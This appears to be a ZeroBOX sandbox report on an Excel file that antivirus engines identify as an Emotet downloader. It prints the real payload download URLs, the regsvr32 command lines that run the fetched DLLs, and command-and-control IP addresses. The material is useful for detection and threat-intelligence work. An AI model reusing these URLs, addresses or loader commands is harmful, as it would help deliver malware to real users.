Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Nov. 7, 2022, 10:28 a.m.	Nov. 7, 2022, 10:30 a.m.

Size	255.0KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:19:34 2015, Last Saved Time/Date: Sun Nov 6 17:53:39 2022, Security: 0
MD5	`893f9b10a48073fc3fa0d5c8867f7200`
SHA256	`1c5f2ca9839078742383b207721ce92fdfa70ac50e5d7b73c2488d47f7e5ebac`
CRC32	`925E90AC`
ssdeep	`6144:6Kpb8rGYrMPe3q7Q0XV5xtuEsi8/dgVNiwrfx9rNFMMrttRzV5Dz3UxqC8LUcST:5NbDjP9XH5XIqZLnST`
Yara	Microsoft_Office_File_Zero - Microsoft Office File Microsoft_Office_File_Downloader_Zero - Microsoft Office File Downloader

EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" C:\Users\test22\AppData\Local\Temp\2022-11-07_0822.xls
2064
- regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx
  2280
- regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx
  2336
- regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx
  2428
  - regsvr32.exe /S ..\oxnv3.ooccxx
    2472
    - regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GsfmvCBAVaoeoYKLE\xSKUW.dll"
      2828
- regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx
  2920
  - regsvr32.exe /S ..\oxnv4.ooccxx
    2964
    - regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HgOMiVzg\RTZrEiqVWztX.dll"
      3036
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
apps.identrust.com	CNAME a1952.dscq.akamai.net A 23.43.165.105 CNAME identrust.edgesuite.net A 23.43.165.66	23.53.228.10
clanbaker.org	A 208.87.225.118	208.87.225.118
cs.com.sg	A 103.237.169.99	103.237.169.99
atici.net	A 185.15.196.157	185.15.196.157
j2ccamionmagasin.fr	A 51.68.231.20	51.68.231.20

IP Address	Status	Action
103.237.169.99	Active	Moloch
149.28.143.92	Active	Moloch
164.124.101.2	Active	Moloch
169.60.181.70	Active	Moloch
182.162.143.56	Active	Moloch
185.15.196.157	Active	Moloch
187.63.160.88	Active	Moloch
208.87.225.118	Active	Moloch
23.43.165.105	Active	Moloch
51.68.231.20	Active	Moloch
91.187.140.35	Active	Moloch
94.23.45.86	Active	Moloch
95.217.221.146	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49162 -> 103.237.169.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 51.68.231.20:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.15.196.157:80 -> 192.168.56.103:49168	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.15.196.157:80 -> 192.168.56.103:49168	2022053	ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2	A Network Trojan was detected
TCP 185.15.196.157:80 -> 192.168.56.103:49168	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 192.168.56.103:49179 -> 182.162.143.56:443	2404308	ET CNC Feodo Tracker Reported CnC Server group 9	A Network Trojan was detected
TCP 192.168.56.103:49181 -> 169.60.181.70:8080	2404307	ET CNC Feodo Tracker Reported CnC Server group 8	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 91.187.140.35:8080	2404323	ET CNC Feodo Tracker Reported CnC Server group 24	A Network Trojan was detected
TCP 182.162.143.56:443 -> 192.168.56.103:49183	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 91.187.140.35:8080 -> 192.168.56.103:49188	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49186 -> 149.28.143.92:443	2404305	ET CNC Feodo Tracker Reported CnC Server group 6	A Network Trojan was detected
TCP 192.168.56.103:49191 -> 187.63.160.88:80	2404310	ET CNC Feodo Tracker Reported CnC Server group 11	A Network Trojan was detected
TCP 187.63.160.88:80 -> 192.168.56.103:49192	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 182.162.143.56:443 -> 192.168.56.103:49180	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 91.187.140.35:8080 -> 192.168.56.103:49190	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 208.87.225.118:80 -> 192.168.56.103:49173	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 208.87.225.118:80 -> 192.168.56.103:49173	2022053	ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2	A Network Trojan was detected
TCP 208.87.225.118:80 -> 192.168.56.103:49173	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 187.63.160.88:80 -> 192.168.56.103:49194	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49162 103.237.169.99:443	C=US, O=Let's Encrypt, CN=R3	CN=cs.com.sg	2a:49:94:e3:bb:32:6d:7a:61:e1:f0:5a:f7:d5:84:d7:05:8d:32:97
TLSv1 192.168.56.103:49166 51.68.231.20:443	C=US, O=Let's Encrypt, CN=R3	CN=j2ccamionmagasin.fr	6f:2f:b3:5c:68:ea:15:5f:43:8a:94:a0:6c:ca:f8:82:af:9f:07:79

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA Nov. 7, 2022, 10:29 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameA Nov. 7, 2022, 10:29 a.m.	computer_name: TEST22-PC	1	1	0

Performs some HTTP requests (3 events)

request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET http://atici.net/old/PkZI74DD/
request	GET http://clanbaker.org/css/khhl7kT2n69n/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 83 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6c318000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6be52000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000010041000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefb941000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefe52d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefddaf000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdbc9000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 region_size: 184320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001e00000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000004d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefd517000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077400000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000774de000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000771d0000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef915c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef90db000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefbd0a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefe31b000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdcc1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdbe1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc021000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefe8aa000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000006910000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000010041000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefb941000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefe52d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefddaf000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdbc9000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 region_size: 184320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000005d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000600000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefd517000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077400000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000774de000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000771d0000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef915c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef90db000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefbd0a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefe471000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007feff9a3000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefd3b1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefcf81000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefd394000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefd20e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefd183000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2964 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000010041000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2964 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefb941000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2964 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefe52d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2964 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefddaf000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2964 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdbc9000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2964 region_size: 184320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001d10000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 7, 2022, 10:29 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001d40000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013\Excel 2013.lnk

Creates a suspicious process (6 events)

cmdline	C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx
cmdline	C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx
cmdline	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GsfmvCBAVaoeoYKLE\xSKUW.dll"
cmdline	C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx
cmdline	C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx
cmdline	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HgOMiVzg\RTZrEiqVWztX.dll"

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (18 events)

Time & API	Arguments	Status	Return
Process32NextW Nov. 7, 2022, 10:28 a.m.	snapshot_handle: 0x0000000000000154 process_name: pw.exe process_identifier: 1688	1	1
Process32NextW Nov. 7, 2022, 10:28 a.m.	snapshot_handle: 0x0000000000000154 process_name: taskhost.exe process_identifier: 1156	1	1
Process32NextW Nov. 7, 2022, 10:28 a.m.	snapshot_handle: 0x0000000000000154 process_name: SearchProtocolHost.exe process_identifier: 1572	1	1
Process32NextW Nov. 7, 2022, 10:28 a.m.	snapshot_handle: 0x0000000000000154 process_name: SearchFilterHost.exe process_identifier: 1020	1	1
Process32NextW Nov. 7, 2022, 10:28 a.m.	snapshot_handle: 0x0000000000000154 process_name: EXCEL.EXE process_identifier: 2064	1	1
Process32NextW Nov. 7, 2022, 10:28 a.m.	snapshot_handle: 0x0000000000000154 process_name: svchost.exe process_identifier: 2160	1	1
Process32NextW Nov. 7, 2022, 10:28 a.m.	snapshot_handle: 0x0000000000000154 process_name: regsvr32.exe process_identifier: 2428	1	1
Process32NextW Nov. 7, 2022, 10:28 a.m.	snapshot_handle: 0x0000000000000154 process_name: regsvr32.exe process_identifier: 2472	1	1
Process32NextW Nov. 7, 2022, 10:29 a.m.	snapshot_handle: 0x0000000000000154 process_name: mscorsvw.exe process_identifier: 2616	1	1
Process32NextW Nov. 7, 2022, 10:29 a.m.	snapshot_handle: 0x0000000000000154 process_name: mscorsvw.exe process_identifier: 2660	1	1
Process32NextW Nov. 7, 2022, 10:29 a.m.	snapshot_handle: 0x0000000000000154 process_name: sppsvc.exe process_identifier: 2740	1	1
Process32NextW Nov. 7, 2022, 10:29 a.m.	snapshot_handle: 0x0000000000000154 process_name: cmd.exe process_identifier: 2780	1	1
Process32NextW Nov. 7, 2022, 10:29 a.m.	snapshot_handle: 0x0000000000000154 process_name: conhost.exe process_identifier: 2788	1	1
Process32NextW Nov. 7, 2022, 10:29 a.m.	snapshot_handle: 0x0000000000000154 process_name: pw.exe process_identifier: 2812	1	1
Process32NextW Nov. 7, 2022, 10:29 a.m.	snapshot_handle: 0x0000000000000154 process_name: regsvr32.exe process_identifier: 2828	1	1
Process32NextW Nov. 7, 2022, 10:29 a.m.	snapshot_handle: 0x0000000000000154 process_name: regsvr32.exe process_identifier: 2920	1	1
Process32NextW Nov. 7, 2022, 10:29 a.m.	snapshot_handle: 0x0000000000000154 process_name: regsvr32.exe process_identifier: 2964	1	1
Process32NextW Nov. 7, 2022, 10:29 a.m.	snapshot_handle: 0x0000000000000154 process_name: regsvr32.exe process_identifier: 3036	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Nov. 7, 2022, 10:28 a.m.	process_identifier: 2064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef70000 process_handle: 0xffffffff	1	0	0

Expresses interest in specific running processes (1 event)

process

regsvr32.exe

Communicates with host for which no DNS query was performed (7 events)

host	149.28.143.92
host	169.60.181.70
host	182.162.143.56
host	187.63.160.88
host	91.187.140.35
host	94.23.45.86
host	95.217.221.146

Network communications indicative of a potential document or script payload download was initiated by the process excel.exe (4 events)

Time & API	Arguments	Status	Return
URLDownloadToFileW Nov. 7, 2022, 10:28 a.m.	url: https://cs.com.sg/Backup/Bk778kXNKMiH5vH/ stack_pivoted: 0 filepath_r: ..\oxnv1.ooccxx filepath: C:\Users\test22\oxnv1.ooccxx		2148270105
URLDownloadToFileW Nov. 7, 2022, 10:28 a.m.	url: https://j2ccamionmagasin.fr/css/1Mp8y/ stack_pivoted: 0 filepath_r: ..\oxnv2.ooccxx filepath: C:\Users\test22\oxnv2.ooccxx		2148270105
URLDownloadToFileW Nov. 7, 2022, 10:28 a.m.	url: http://atici.net/old/PkZI74DD/ stack_pivoted: 0 filepath_r: ..\oxnv3.ooccxx filepath: C:\Users\test22\oxnv3.ooccxx	1	0
URLDownloadToFileW Nov. 7, 2022, 10:29 a.m.	url: http://clanbaker.org/css/khhl7kT2n69n/ stack_pivoted: 0 filepath_r: ..\oxnv4.ooccxx filepath: C:\Users\test22\oxnv4.ooccxx	1	0

One or more non-whitelisted processes were created (4 events)

parent_process	excel.exe	martian_process	C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx
parent_process	excel.exe	martian_process	C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx
parent_process	excel.exe	martian_process	C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx
parent_process	excel.exe	martian_process	C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx

Generates some ICMP traffic

File has been identified by 30 AntiVirus engines on VirusTotal as malicious (30 events)

ClamAV	Xls.Downloader.Emotet-b649c93692b4c9d9-9976616-0
CAT-QuickHeal	Trojan.XLM4.Emotet.47213
ALYac	XLM.Trojan.Abracadabra.8.Gen
Sangfor	Malware.Generic-XLM.Save.Emotet_ma29
K7AntiVirus	Trojan ( 0059086a1 )
K7GW	Trojan ( 0059086a1 )
Cyren	XF/Emotet.E.gen!Eldorado
Symantec	CL.Suspexec!gen128
ESET-NOD32	DOC/TrojanDownloader.Agent.DOV
Avast	VBS:Malware-gen
Kaspersky	HEUR:Trojan.MSOffice.Generic
BitDefender	XLM.Trojan.Abracadabra.8.Gen
MicroWorld-eScan	XLM.Trojan.Abracadabra.8.Gen
Rising	Downloader.Agent/XLM!1.DE99 (CLASSIC)
Ad-Aware	XLM.Trojan.Abracadabra.8.Gen
Emsisoft	XLM.Trojan.Abracadabra.8.Gen (B)
VIPRE	XLM.Trojan.Abracadabra.8.Gen
TrendMicro	Trojan.XF.EMOTET.SMYXCFIC
McAfee-GW-Edition	X97M/Downloader.ph
FireEye	XLM.Trojan.Abracadabra.8.Gen
Ikarus	Trojan-Downloader.XLM.Agent
GData	Macro.Trojan-Downloader.EmoAgent.A
MAX	malware (ai score=83)
Antiy-AVL	Trojan/Generic.ASMacro.FE6E
Arcabit	XLM.Trojan.Abracadabra.8.Gen
Google	Detected
Zoner	Probably Heur.W97ShellB
Tencent	Win32.Trojan-Downloader.Der.Xmhl
Fortinet	MSExcel/Agent.DKF!tr.dldr
AVG	VBS:Malware-gen

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (5 events)

dead_host	94.23.45.86:4143
dead_host	95.217.221.146:8080
dead_host	149.28.143.92:443
dead_host	169.60.181.70:8080
dead_host	192.168.56.103:49197

2022-11-07_0822.xls

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All